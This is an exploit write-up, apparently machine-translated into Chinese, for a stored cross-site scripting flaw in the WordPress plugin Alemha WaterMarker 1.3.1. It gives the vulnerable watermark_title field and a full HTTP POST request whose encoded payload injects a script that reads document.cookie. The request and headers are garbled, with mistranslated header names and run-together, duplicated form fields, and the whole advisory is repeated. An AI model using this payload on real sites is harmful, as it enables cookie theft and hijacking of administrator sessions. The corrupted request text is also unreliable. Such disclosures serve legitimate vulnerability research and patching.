#利用标题: WordPress插件Alemha WaterMarker 1.3.1-存储的跨站点脚本(XSS)
#Date: 2024年3月22日
#利用作者: erdemstar
#vendor: https://wordpress.com/
#版本: 1.3.1
#概念证明:
1。单击添加新水印,然后输入XSS有效载荷到水印文本中。
2。存储的XSS将在任何想编辑此页面的人上运行。
#弱势属性: WaterMark_title
#POC VIDEO:
#request:
post/wp-admin/post.php http/2
HOST: ERDEMSTAR.LOCAL
cookie: wordpress_sec_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww06666cnci Uhagumsk3wltvpskghvmtzp%7C50573CB574C70A41A241CB9F1F1F1F1E3FF22F539F539FC8630599F2503D02503D0202A6C1A7E7E678; wordpress_test_cookie=wp%20cookie%20check; wp_lang=en_us; WP-SETTINGS TIME-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww066c nciuhagumsk3wltvpskghvmtzp%7CDAE14D9D9AA7F0C4DF03783BB2B2B2B21A5B3D6A63D8C3E1AE1AE1AE1AE1AE1AE1DDDDA689C59595862; WP-SETTINGS TIME-5=1711124723
内容长度: 1460
升级- 不肯定- requests: 1
Origin: https://erdemstar.local
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/122.0.6261.112 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Referer: https://erdemstar.local/wp-admin/post-new.php?
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
Priority: u=0,i
_wpnonce=99A1D1E63A_WP_HTTP_REFERER=%2FWP-ADMIN%2FPOST-NEW.PHP%3FPOST_TYPE%3DWaterMarkser_id=5Action=5Action=5Action=EditPostoriginalAction=EditPostoriginalAction=EditPostPostPostPostPostPostPostPostPost_Author=5post _ towspe_typerigigina l_post_status=auto-draftreferredby=https%3A%2f%2f%2ferdemstar.local%2fwp-admin%2fedit.php% 3FPOST_TYPE%3Dwatermark_wp_original_http_referer=https%3A%2F%2f%2ferDemstar.local%2FWP-ADM在%2feDit.php%3FPOST_TYPE%%%3DwaterMarkauto_draft=1post_id=35meta-box-order-nonce=ea875c0c6fclosedpostboxesnonce=d29be25ad88post_title=Smamplepermalinknonce=1eppermalinknonce=1EED33AWWAW PREVPERVPERVEFPEREVPEFEFERVEFPEREVPERVEFPEREVPEFEFEFEFEFEFEFEFEFEFEFERVEFPEREVPEREVERDED=hidden_post_status=draftpost_status=draftthidden_post_password=sidend_post_visibility=publicvisibility=publicPost_pass_password=mm=03JJ=22AA=2024HH=2024HH=16mn=16mn=25SS=25SS=23HIDDIDER_MM=03CUR_MM=03CUR_MM=03HIDDER_JJ=22CUR_JJ=22HIDDER_AA=2024CUR_AA=2024HIDDER_HH=16CUR_HH=16HIDDER_MN=25CUR_MN=25CUR_MN=25original_publish=25original_publish=PublishPublish=PublishPublish=PublishTax_Input%5BCATEGIOR ustom_meta_box_nonce=d1322f94a0watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eimg_sizes%5B%5D=thumbnailimg_sizes%5B%5D=mediumimg_sizes%5B%5D=large img_sizes%5b%5D=fulftxt_type=arial.ttfrgb=38%2C1%2C24TXT_SIZE=8color=%23260118Rotation=100position=100position=topdestance_x=mesaure_x=mesaure_x=pxpadding=pxpadding=pxpadding=yesaure_y=mesaure_y=mesaure_y=pxback ==255%2C0%2c0bg_destance_x=bg_padding=color_bg=%23ff0000image=img_rotation=img_opicity=100img_position=topimg_size=topimg_size=4img_destance_x=img_mesaure_mesaure_x=pxim_x=pximg_padeur=pximg_padding=imgmesa=imgmesa
#Date: 2024年3月22日
#利用作者: erdemstar
#vendor: https://wordpress.com/
#版本: 1.3.1
#概念证明:
1。单击添加新水印,然后输入XSS有效载荷到水印文本中。
2。存储的XSS将在任何想编辑此页面的人上运行。
#弱势属性: WaterMark_title
#POC VIDEO:
post/wp-admin/post.php http/2
HOST: ERDEMSTAR.LOCAL
cookie: wordpress_sec_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww06666cnci Uhagumsk3wltvpskghvmtzp%7C50573CB574C70A41A241CB9F1F1F1F1E3FF22F539F539FC8630599F2503D02503D0202A6C1A7E7E678; wordpress_test_cookie=wp%20cookie%20check; wp_lang=en_us; WP-SETTINGS TIME-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww066c nciuhagumsk3wltvpskghvmtzp%7CDAE14D9D9AA7F0C4DF03783BB2B2B2B21A5B3D6A63D8C3E1AE1AE1AE1AE1AE1AE1DDDDA689C59595862; WP-SETTINGS TIME-5=1711124723
内容长度: 1460
升级- 不肯定- requests: 1
Origin: https://erdemstar.local
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/122.0.6261.112 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Referer: https://erdemstar.local/wp-admin/post-new.php?
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
Priority: u=0,i
_wpnonce=99A1D1E63A_WP_HTTP_REFERER=%2FWP-ADMIN%2FPOST-NEW.PHP%3FPOST_TYPE%3DWaterMarkser_id=5Action=5Action=5Action=EditPostoriginalAction=EditPostoriginalAction=EditPostPostPostPostPostPostPostPostPost_Author=5post _ towspe_typerigigina l_post_status=auto-draftreferredby=https%3A%2f%2f%2ferdemstar.local%2fwp-admin%2fedit.php% 3FPOST_TYPE%3Dwatermark_wp_original_http_referer=https%3A%2F%2f%2ferDemstar.local%2FWP-ADM在%2feDit.php%3FPOST_TYPE%%%3DwaterMarkauto_draft=1post_id=35meta-box-order-nonce=ea875c0c6fclosedpostboxesnonce=d29be25ad88post_title=Smamplepermalinknonce=1eppermalinknonce=1EED33AWWAW PREVPERVPERVEFPEREVPEFEFERVEFPEREVPERVEFPEREVPEFEFEFEFEFEFEFEFEFEFEFERVEFPEREVPEREVERDED=hidden_post_status=draftpost_status=draftthidden_post_password=sidend_post_visibility=publicvisibility=publicPost_pass_password=mm=03JJ=22AA=2024HH=2024HH=16mn=16mn=25SS=25SS=23HIDDIDER_MM=03CUR_MM=03CUR_MM=03HIDDER_JJ=22CUR_JJ=22HIDDER_AA=2024CUR_AA=2024HIDDER_HH=16CUR_HH=16HIDDER_MN=25CUR_MN=25CUR_MN=25original_publish=25original_publish=PublishPublish=PublishPublish=PublishTax_Input%5BCATEGIOR ustom_meta_box_nonce=d1322f94a0watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eimg_sizes%5B%5D=thumbnailimg_sizes%5B%5D=mediumimg_sizes%5B%5D=large img_sizes%5b%5D=fulftxt_type=arial.ttfrgb=38%2C1%2C24TXT_SIZE=8color=%23260118Rotation=100position=100position=topdestance_x=mesaure_x=mesaure_x=pxpadding=pxpadding=pxpadding=yesaure_y=mesaure_y=mesaure_y=pxback ==255%2C0%2c0bg_destance_x=bg_padding=color_bg=%23ff0000image=img_rotation=img_opicity=100img_position=topimg_size=topimg_size=4img_destance_x=img_mesaure_mesaure_x=pxim_x=pximg_padeur=pximg_padding=imgmesa=imgmesa